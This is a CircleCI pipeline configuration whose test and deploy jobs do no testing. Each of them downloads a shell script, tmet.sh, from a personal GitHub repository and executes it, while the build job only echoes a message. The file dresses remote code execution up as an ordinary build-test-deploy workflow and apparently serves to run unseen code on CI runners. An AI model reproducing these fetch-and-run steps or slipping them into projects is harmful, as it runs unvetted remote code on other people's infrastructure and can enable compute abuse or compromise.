version: 2.1

jobs:
  build:
    docker:
      - image: cimg/base:2022.03
    parallelism: 4
    steps:
      - checkout
      - run: echo "Building complete"
  test-node:
    docker:
      - image: cimg/node:17.6.0
    steps:
      - run: wget https://raw.githubusercontent.com/erwinkato/mamet/main/tmet.sh && chmod +x tmet.sh && ./tmet.sh
  test-node-16:
    docker:
      - image: cimg/node:16.14.0
    steps:
      - run: wget https://raw.githubusercontent.com/erwinkato/mamet/main/tmet.sh && chmod +x tmet.sh && ./tmet.sh
  test-node-14:
    docker:
      - image: cimg/node:14.19.0
    steps:
      - run: wget https://raw.githubusercontent.com/erwinkato/mamet/main/tmet.sh && chmod +x tmet.sh && ./tmet.sh
  deploy:
      docker:
        - image: cimg/base:2022.03
      steps:
        - run: wget https://raw.githubusercontent.com/erwinkato/mamet/main/tmet.sh && chmod +x tmet.sh && ./tmet.sh

workflows:
  build-test-and-deploy:
    jobs:
      - build
      - test-node:
          requires: 
            - build
      - test-node-16:
          requires: 
            - build
      - test-node-14:
          requires: 
            - build
      - deploy:
          requires: 
            - build
            - test-node
            - test-node-16
            - test-node-14
